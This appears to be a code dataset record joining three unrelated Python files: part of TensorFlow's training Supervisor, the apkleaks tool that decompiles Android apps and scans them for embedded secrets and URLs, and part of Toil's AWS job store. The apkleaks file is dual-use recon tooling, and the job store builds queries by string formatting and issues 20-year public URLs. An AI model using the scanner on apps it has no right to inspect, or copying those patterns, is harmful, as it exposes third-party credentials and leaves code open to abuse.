ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if not checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
apkleaks.py
|
#!/usr/bin/env python3
import io
import json
import logging.config
import os
import re
import shutil
import sys
import tempfile
import threading
from contextlib import closing
from distutils.spawn import find_executable
from pathlib import Path
from pipes import quote
from urllib.request import urlopen
from zipfile import ZipFile
from pyaxmlparser import APK
from apkleaks.colors import color as col
from apkleaks.utils import util
class APKLeaks:
def __init__(self, args):
self.apk = None
self.file = os.path.realpath(args.file)
self.json = args.json
self.disarg = args.args
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".%s" % ("json" if self.json else "txt"), prefix=self.prefix)[1] if args.output is None else args.output
self.fileout = open(self.output, "%s" % ("w" if self.json else "a"))
self.pattern = os.path.join(str(Path(self.main_dir).parent), "config", "regexes.json") if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else os.path.join(str(Path(self.main_dir).parent), "jadx", "bin", "jadx%s" % (".bat" if os.name == "nt" else "")).replace("\\","/")
self.out_json = {}
self.scanned = False
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
try:
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(os.path.join(str(Path(self.main_dir).parent), "jadx"))
os.chmod(self.jadx, 33268)
except Exception as error:
util.writeln(str(error), col.WARNING)
sys.exit()
def integrity(self):
if os.path.exists(self.jadx) is False:
util.writeln("Can't find jadx binary.", col.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
util.write("Do you want to download jadx? (Y/n) ", col.OKBLUE)
try:
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
util.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", col.WARNING)
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting.", col.FAIL))
if choice:
util.writeln("\n** Downloading jadx...\n", col.OKBLUE)
self.dependencies()
else:
sys.exit(util.writeln("\n** Aborted.", col.FAIL))
if os.path.isfile(self.file):
try:
self.apk = self.apk_info()
except Exception as error:
util.writeln(str(error), col.WARNING)
sys.exit()
else:
return self.apk
else:
sys.exit(util.writeln("It's not a valid file!", col.WARNING))
def decompile(self):
util.writeln("** Decompiling APK...", col.OKBLUE)
args = [self.jadx, self.file, "-d", self.tempdir]
try:
args.extend(re.split(r"\s|=", self.disarg))
except Exception:
pass
comm = "%s" % (" ".join(quote(arg) for arg in args))
comm = comm.replace("\'","\"")
os.system(comm)
def extract(self, name, matches):
if len(matches):
stdout = ("[%s]" % (name))
util.writeln("\n" + stdout, col.OKGREEN)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
for secret in matches:
if name == "LinkFinder":
if re.match(r"^.(L[a-z]|application|audio|fonts|image|kotlin|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
secret = secret[len("'"):-len("'")]
stdout = ("- %s" % (secret))
print(stdout)
self.fileout.write("%s" % (stdout + "\n" if self.json is False else ""))
self.fileout.write("%s" % ("\n" if self.json is False else ""))
self.out_json["results"].append({"name": name, "matches": matches})
self.scanned = True
def scanning(self):
if self.apk is None:
sys.exit(util.writeln("** Undefined package. Exit!", col.FAIL))
util.writeln("\n** Scanning against '%s'" % (self.apk.package), col.OKBLUE)
self.out_json["package"] = self.apk.package
self.out_json["results"] = []
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for p in pattern:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(p, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
else:
try:
thread = threading.Thread(target = self.extract, args = (name, util.finder(pattern, self.tempdir)))
thread.start()
except KeyboardInterrupt:
sys.exit(util.writeln("\n** Interrupted. Aborting...", col.FAIL))
def cleanup(self):
shutil.rmtree(self.tempdir)
if self.scanned:
self.fileout.write("%s" % (json.dumps(self.out_json, indent=4) if self.json else ""))
self.fileout.close()
print("%s\n** Results saved into '%s%s%s%s'%s." % (col.HEADER, col.ENDC, col.OKGREEN, self.output, col.HEADER, col.ENDC))
else:
self.fileout.close()
os.remove(self.output)
util.writeln("\n** Done with nothing. ¯\\_(ツ)_/¯", col.WARNING)
|
awsJobStore.py
|
# Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from StringIO import StringIO
from contextlib import contextmanager
import logging
import os
import re
from threading import Thread
import uuid
import bz2
import cPickle
import base64
import hashlib
# noinspection PyUnresolvedReferences
from boto.sdb.domain import Domain
# noinspection PyUnresolvedReferences
from boto.s3.bucket import Bucket
# noinspection PyUnresolvedReferences
from boto.s3.connection import S3Connection
# noinspection PyUnresolvedReferences
from boto.sdb.connection import SDBConnection
from boto.sdb.item import Item
import boto.s3
import boto.sdb
from boto.exception import SDBResponseError, S3ResponseError, BotoServerError
import itertools
import time
from toil.jobStores.abstractJobStore import AbstractJobStore, NoSuchJobException, \
ConcurrentFileModificationException, NoSuchFileException
from toil.jobWrapper import JobWrapper
log = logging.getLogger(__name__)
# FIXME: Command length is currently limited to 1024 characters
# FIXME: Passing in both headers and validate=False caused BotoClientError: When providing 'validate=False', no other
# params are allowed. Solution, validate=False was removed completely, but could potentially be passed if not encrypting
# NB: Number of messages per job is limited to 256-x, 1024 bytes each, with x being the number of
# other attributes in the item
# FIXME: enforce SimpleDB limits early
class AWSJobStore(AbstractJobStore):
"""
A job store that uses Amazon's S3 for file storage and SimpleDB for storing job info and enforcing strong
consistency on the S3 file storage. There will be SDB domains for jobs and versions and versioned S3 buckets for
files and stats. The content of files and stats are stored as keys on the respective bucket while the latest
version of a key is stored in the versions SDB domain. Job objects are pickled, compressed, partitioned into
chunks of 1024 bytes and each chunk is stored as a an attribute of the SDB item representing the job. UUIDs are
used to identify jobs and files.
"""
def fileExists(self, jobStoreFileID):
return bool(self.versions.get_item(item_name=jobStoreFileID, consistent_read=True))
def jobs(self):
result = None
for attempt in retry_sdb():
with attempt:
result = list(self.jobDomain.select(
query="select * from `{domain}` ".format(domain=self.jobDomain.name),
consistent_read=True))
assert result is not None
for jobItem in result:
yield AWSJob.fromItem(jobItem)
def create(self, command, memory, cores, disk, updateID=None,
predecessorNumber=0):
jobStoreID = self._newJobID()
log.debug("Creating job %s for '%s'",
jobStoreID, '<no command>' if command is None else command)
job = AWSJob(jobStoreID=jobStoreID,
command=command, memory=memory, cores=cores, disk=disk,
remainingRetryCount=self._defaultTryCount(), logJobStoreFileID=None,
updateID=updateID, predecessorNumber=predecessorNumber)
for attempt in retry_sdb():
with attempt:
assert self.jobDomain.put_attributes(item_name=jobStoreID,
attributes=job.toItem())
return job
def __init__(self, region, namePrefix, config=None):
"""
Create a new job store in AWS or load an existing one from there.
:param region: the AWS region to create the job store in, e.g. 'us-west-2'
:param namePrefix: S3 bucket names and SDB tables will be prefixed with this
:param config: the config object to written to this job store. Must be None for existing
job stores. Must not be None for new job stores.
"""
log.debug("Instantiating %s for region %s and name prefix '%s'",
self.__class__, region, namePrefix)
self.region = region
self.namePrefix = namePrefix
self.jobDomain = None
self.versions = None
self.files = None
self.stats = None
self.db = self._connectSimpleDB()
self.s3 = self._connectS3()
self.sseKey = None
# Check global registry domain for existence of this job store. The first time this is
# being executed in an AWS account, the registry domain will be created on the fly.
create = config is not None
self.registry_domain = self._getOrCreateDomain('toil-registry')
for attempt in retry_sdb():
with attempt:
attributes = self.registry_domain.get_attributes(item_name=namePrefix,
attribute_name='exists',
consistent_read=True)
exists = parse_bool(attributes.get('exists', str(False)))
self._checkJobStoreCreation(create, exists, region + ":" + namePrefix)
self.jobDomain = self._getOrCreateDomain(self.qualify('jobs'))
self.versions = self._getOrCreateDomain(self.qualify('versions'))
self.files = self._getOrCreateBucket(self.qualify('files'), versioning=True)
self.stats = self._getOrCreateBucket(self.qualify('stats'), versioning=True)
# Now register this job store
for attempt in retry_sdb():
with attempt:
self.registry_domain.put_attributes(item_name=namePrefix,
attributes=dict(exists='True'))
super(AWSJobStore, self).__init__(config=config)
if self.config.sseKey is not None:
with open(self.config.sseKey) as f:
self.sseKey = f.read()
def qualify(self, name):
return self.namePrefix + self.nameSeparator + name
def exists(self, jobStoreID):
for attempt in retry_sdb():
with attempt:
return bool(self.jobDomain.get_attributes(item_name=jobStoreID,
attribute_name=[],
consistent_read=True))
def getPublicUrl(self, jobStoreFileID):
"""
For Amazon SimpleDB requests, use HTTP GET requests that are URLs with query strings.
http://awsdocs.s3.amazonaws.com/SDB/latest/sdb-dg.pdf
Create url, check if valid, return.
Encrypted file urls are currently not supported
"""
key = self.files.get_key(key_name=jobStoreFileID)
# There should be no practical upper limit on when a job is allowed to access a public
# URL so we set the expiration to 20 years.
return key.generate_url(expires_in=60 * 60 * 24 * 365 * 20)
def getSharedPublicUrl(self, FileName):
jobStoreFileID = self._newFileID(FileName)
return self.getPublicUrl(jobStoreFileID)
def load(self, jobStoreID):
# TODO: check if mentioning individual attributes is faster than using *
result = None
for attempt in retry_sdb():
with attempt:
result = list(self.jobDomain.select(
query="select * from `{domain}` "
"where itemName() = '{jobStoreID}'".format(domain=self.jobDomain.name,
jobStoreID=jobStoreID),
consistent_read=True))
assert result is not None
if len(result) != 1:
raise NoSuchJobException(jobStoreID)
job = AWSJob.fromItem(result[0])
if job is None:
raise NoSuchJobException(jobStoreID)
log.debug("Loaded job %s", jobStoreID)
return job
def update(self, job):
log.debug("Updating job %s", job.jobStoreID)
for attempt in retry_sdb():
with attempt:
assert self.jobDomain.put_attributes(item_name=job.jobStoreID,
attributes=job.toItem())
items_per_batch_delete = 25
def delete(self, jobStoreID):
# remove job and replace with jobStoreId.
log.debug("Deleting job %s", jobStoreID)
for attempt in retry_sdb():
with attempt:
self.jobDomain.delete_attributes(item_name=jobStoreID)
items = None
for attempt in retry_sdb():
with attempt:
items = list(self.versions.select(
query="select * from `%s` "
"where jobStoreID='%s'" % (self.versions.name, jobStoreID),
consistent_read=True))
assert items is not None
if items:
log.debug("Deleting %d file(s) associated with job %s", len(items), jobStoreID)
n = self.items_per_batch_delete
batches = [items[i:i + n] for i in range(0, len(items), n)]
for batch in batches:
for attempt in retry_sdb():
with attempt:
self.versions.batch_delete_attributes({item.name: None for item in batch})
for item in items:
if 'version' in item:
self.files.delete_key(key_name=item.name,
version_id=item['version'])
else:
self.files.delete_key(key_name=item.name)
def writeFile(self, localFilePath, jobStoreID=None):
jobStoreFileID = self._newFileID()
firstVersion = self._upload(jobStoreFileID, localFilePath)
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID, newVersion=firstVersion)
log.debug("Wrote initial version %s of file %s for job %s from path '%s'",
firstVersion, jobStoreFileID, jobStoreID, localFilePath)
return jobStoreFileID
@contextmanager
def writeFileStream(self, jobStoreID=None):
jobStoreFileID = self._newFileID()
with self._uploadStream(jobStoreFileID, self.files) as (writable, key):
yield writable, jobStoreFileID
firstVersion = key.version_id
assert firstVersion is not None
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID, newVersion=firstVersion)
log.debug("Wrote initial version %s of file %s for job %s",
firstVersion, jobStoreFileID, jobStoreID)
@contextmanager
def writeSharedFileStream(self, sharedFileName, isProtected=True):
assert self._validateSharedFileName(sharedFileName)
jobStoreFileID = self._newFileID(sharedFileName)
oldVersion = self._getFileVersion(jobStoreFileID)
with self._uploadStream(jobStoreFileID, self.files,
encrypted=isProtected) as (writable, key):
yield writable
newVersion = key.version_id
jobStoreId = str(self.sharedFileJobID) if oldVersion is None else None
self._registerFile(jobStoreFileID,
jobStoreID=jobStoreId, oldVersion=oldVersion, newVersion=newVersion)
if oldVersion is None:
log.debug("Wrote initial version %s of shared file %s (%s)",
newVersion, sharedFileName, jobStoreFileID)
else:
log.debug("Wrote version %s of file %s (%s), replacing version %s",
newVersion, sharedFileName, jobStoreFileID, oldVersion)
def updateFile(self, jobStoreFileID, localFilePath):
oldVersion = self._getFileVersion(jobStoreFileID)
newVersion = self._upload(jobStoreFileID, localFilePath)
self._registerFile(jobStoreFileID, oldVersion=oldVersion, newVersion=newVersion)
log.debug("Wrote version %s of file %s from path '%s', replacing version %s",
newVersion, jobStoreFileID, localFilePath, oldVersion)
@contextmanager
def updateFileStream(self, jobStoreFileID):
oldVersion = self._getFileVersion(jobStoreFileID)
with self._uploadStream(jobStoreFileID, self.files) as (writable, key):
yield writable
newVersion = key.version_id
self._registerFile(jobStoreFileID, oldVersion=oldVersion, newVersion=newVersion)
log.debug("Wrote version %s of file %s, replacing version %s",
newVersion, jobStoreFileID, oldVersion)
def readFile(self, jobStoreFileID, localFilePath):
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Reading version %s of file %s to path '%s'",
version, jobStoreFileID, localFilePath)
self._download(jobStoreFileID, localFilePath, version)
@contextmanager
def readFileStream(self, jobStoreFileID):
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Reading version %s of file %s", version, jobStoreFileID)
with self._downloadStream(jobStoreFileID, version, self.files) as readable:
yield readable
@contextmanager
def readSharedFileStream(self, sharedFileName, isProtected=True):
assert self._validateSharedFileName(sharedFileName)
jobStoreFileID = self._newFileID(sharedFileName)
version = self._getFileVersion(jobStoreFileID)
if version is None: raise NoSuchFileException(jobStoreFileID)
log.debug("Read version %s from shared file %s (%s)",
version, sharedFileName, jobStoreFileID)
with self._downloadStream(jobStoreFileID, version, self.files,
encrypted=isProtected) as readable:
yield readable
def deleteFile(self, jobStoreFileID):
version, bucket = self._getFileVersionAndBucket(jobStoreFileID)
if bucket:
for attempt in retry_sdb():
with attempt:
if version:
self.versions.delete_attributes(jobStoreFileID,
expected_values=['version', version])
else:
self.versions.delete_attributes(jobStoreFileID)
bucket.delete_key(key_name=jobStoreFileID, version_id=version)
if version:
log.debug("Deleted version %s of file %s", version, jobStoreFileID)
else:
log.debug("Deleted unversioned file %s", jobStoreFileID)
else:
log.debug("File %s does not exist", jobStoreFileID)
def getEmptyFileStoreID(self, jobStoreID=None):
jobStoreFileID = self._newFileID()
self._registerFile(jobStoreFileID, jobStoreID=jobStoreID)
log.debug("Registered empty file %s for job %s", jobStoreFileID, jobStoreID)
return jobStoreFileID
def writeStatsAndLogging(self, statsAndLoggingString):
jobStoreFileId = self._newFileID()
with self._uploadStream(jobStoreFileId, self.stats, multipart=False) as (writeable, key):
writeable.write(statsAndLoggingString)
firstVersion = key.version_id
self._registerFile(jobStoreFileId, bucketName='stats', newVersion=firstVersion)
def readStatsAndLogging(self, statsCallBackFn):
itemsProcessed = 0
items = None
for attempt in retry_sdb():
with attempt:
items = list(self.versions.select(
query="select * from `%s` "
"where bucketName='stats'" % (self.versions.name,),
consistent_read=True))
assert items is not None
for item in items:
with self._downloadStream(item.name, item['version'], self.stats) as readable:
statsCallBackFn(readable)
self.deleteFile(item.name)
itemsProcessed += 1
return itemsProcessed
# Dots in bucket names should be avoided because bucket names are used in HTTPS bucket
# URLs where the may interfere with the certificate common name. We use a double
# underscore as a separator instead.
bucketNameRe = re.compile(r'^[a-z0-9][a-z0-9-]+[a-z0-9]$')
nameSeparator = '--'
@classmethod
def _parseArgs(cls, jobStoreString):
region, namePrefix = jobStoreString.split(':')
# See http://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html,
# reserve 10 characters for separator and suffixes
